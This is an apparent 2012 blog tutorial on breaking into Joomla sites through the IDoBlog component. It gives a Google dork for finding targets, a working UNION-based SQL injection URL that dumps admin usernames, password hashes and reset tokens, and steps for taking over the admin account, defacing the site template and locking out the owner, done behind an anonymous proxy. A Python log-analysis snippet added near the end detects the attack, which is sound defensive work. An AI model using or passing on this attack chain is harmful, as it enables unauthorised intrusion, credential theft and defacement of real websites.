
Monday, October 1, 2012

HOW TO HACK JOOMLA!


Level: NFN (Not For Noobs)

Tools required:
SQL-i Knowledge
reiluke SQLiHelper 2.7
Joomla! Query Knowledge

DISCLAIMER:
THIS TUTORIAL IS FOR EDUCATIONAL PURPOSES ONLY!!! YOU MAY NOT READ THIS TUTORIAL IF YOU DON'T UNDERSTAND AND AGREE TO THIS DISCLAIMER. I, AS AUTHOR OF THIS TUTORIAL, WILL NOT BE HELD RESPONSIBLE FOR THE MISUSE OF THE INFORMATION CONTAINED WITHIN THIS TUTORIAL. IF YOU ABUSE THIS TUTORIAL FOR ILLEGAL PURPOSES I WILL NOT BE HELD RESPONSIBLE FOR ANY ACTION THAT MAY BE TAKEN AGAINST YOU AS A RESULT OF YOUR MISUSE.

NOTE:
USE ANONYMOUS PROXY!!!

Introduction

Joomla! as a Stable-Full Package is probably unhackable, and if someone tells you that they HACKED Joomla, they are talking rubbish!!!
But people have still hacked sites that use Joomla as a Content Management System?!?
Joomla is made of components and modules, and there are developers apart from the official team who offer their own solutions to improve Joomla. The components and modules made by those other developers are the weak spots!

I hacked a site that used Joomla! v1.5.6 and after that v1.5.9 through IDoBlog v1.1, but I can't say that I hacked Joomla!

Finding Exploit And Target

Those two steps can go in either order, depending on what you find first, target or exploit...

Google dork: inurl:"option=com_idoblog"
Comes up with results for about 140,000 pages


At inj3ct0r.com search for: com_idoblog
This returns: Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vuln


==
Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vuln
==

index.php?option=com_idoblog&task=profile&Itemid=1 337&userid=62+union+select+1,concat_ws(0x3a,userna me,password),3,4,5,6,7,8,9,10,​11,12,13,14,15,16+f rom+jos_users--

The exploit can be separated into two parts:

Part I
index.php?option=com_idoblog&task=profile&Itemid=1 337&userid=62
This part opens the blog Admin page, and if the Admin page doesn't exist, the exploit won't work (not completely confirmed)

Part II
+union+select+1,concat_ws(0x3a,username,password), 3,4,5,6,7,8,9,10,11,12,13,14,1​5,16+from+jos_users--
This part looks for the username and password in the jos_users table

Testing Vulnerability

Disable images for faster page loading:
[Firefox]
Tools >> Options >> Content (tab menu) >> and uncheck 'Load images automatically'


Go to:
Code:

http://www.site.com/index.php?option...blog&Itemid=22

Site loads normally...

Go to:
Code:

http://www.site.com/index.php?option...1337&userid=62

Site contains the blog profile of Admin

Go to:
Code:

http://www.site.com/index.php?option...ion+select+1--

Site is vulnerable

Inject Target

Open reiluke SQLiHelper 2.7
In Target copy Code:

http://www.site.com/index.php?option...1337&userid=62

and click on Inject
Follow the standard steps until you find Column Name.

Notice that the exploit from inj3ct0r wouldn't work here because it looks for the jos_users table and, as you can see,
our target uses the jos153_users table for storing data

Let's dump username, email, password from Column Name jos153_users. Click on Dump Now


username: admin
email: info@site.com
password: 169fad83bb2ac775bbaef4938d504f4e:mlqMfY0Vc9KLxPk05 6eewFWM13vEThJI


Joomla! 1.5.x uses md5 to hash the passwords. When the passwords are created, they are hashed with a
32 character salt that is appended to the end of the password string. The password is stored as
{TOTAL HASH}:{ORIGINAL SALT}. So cracking that password takes a lot of time...


The easiest way to hack is to reset Admin password!

Admin Password Reset

Go to:
Code:

http://www.site.com/index.php?option...ser&view=reset

This is the standard Joomla! query for a password reset request


The Forgot your Password? page will load.
In E-mail Address: enter the admin email (in our case it is: info@site.com) and press Submit.
If you found the right admin email, the Confirm your account. page will load, asking for Token:

Finding Token

To find token go back to reiluke SQLiHelper 2.7 and dump username and activation from Column Name jos153_users


username: admin
activation: 5482dd177624761a290224270fa55f1d


5482dd177624761a290224270fa55f1d is the 32 char verification token, enter it and press Submit.


If you did everything OK, the Reset your Password page will load. Enter your new password...

After that go to:
Code:

http://www.site.com/administrator/

Standard Joomla portal content management system

Enter username admin and your password, click on Login
Go to Extensions >> Template Manager >> Default Template Name >> Edit HTML
In Template HTML Editor insert your defaced code, click ApplySave and you are done!!!


To make admin life more miserable, click on admin in main Joomla window and in User Details page change admin E-mail
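
Seen from the defending side, the chain above leaves a recognizable trail in the web server access log: a com_idoblog request whose userid is not a plain integer, followed by a password reset request (view=reset) from the same client. The log check below is an added example, not part of the original tutorial; the log lines are constructed, and the function names, the Apache combined log format and the com_user option value in the sample are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed sample lines in Apache "combined" format (not real traffic).
# "com_user" is an assumption; the check itself only keys on view=reset.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Oct/2012:10:00:01 +0000] "GET /index.php?option=com_idoblog&task=profile&Itemid=22&userid=62 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [01/Oct/2012:10:02:13 +0000] "GET /index.php?option=com_idoblog&task=profile&Itemid=22&userid=62+union+select+1-- HTTP/1.1" 200 4890 "-" "Mozilla/5.0"
203.0.113.9 - - [01/Oct/2012:10:02:40 +0000] "GET /index.php?option=com_idoblog&task=profile&Itemid=22&userid=62%2520UNION%2520SELECT%25201 HTTP/1.1" 200 4890 "-" "Mozilla/5.0"
203.0.113.9 - - [01/Oct/2012:10:09:55 +0000] "GET /index.php?option=com_user&view=reset HTTP/1.1" 200 3011 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Oct/2012:10:11:02 +0000] "GET /index.php?option=com_user&view=reset HTTP/1.1" 200 3011 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) [^"]*"')

def fully_decode(value, rounds=3):
    """Undo repeated URL-encoding (e.g. %2520) so the check sees the final text."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def analyse(log_text):
    """Return (hits, followups): com_idoblog requests with a non-integer userid,
    and later view=reset requests from a client that sent one."""
    hits, followups, suspects = [], [], set()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, ts, target = m.groups()
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        if params.get("option", [""])[0] == "com_idoblog":
            for raw in params.get("userid", []):
                value = fully_decode(raw)
                if not re.fullmatch(r"[0-9]+", value):  # allow-list: digits only
                    hits.append((ip, ts, value))
                    suspects.add(ip)
        elif params.get("view", [""])[0] == "reset" and ip in suspects:
            followups.append((ip, ts))
    return hits, followups

if __name__ == "__main__":
    print(analyse(SAMPLE_LOG))
```

This only detects the pattern; the fix is for the component to cast userid to an integer or bind it as a query parameter before it reaches the database.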


Make this tutorial alive!!!


credit to K1NG0FH@CK 
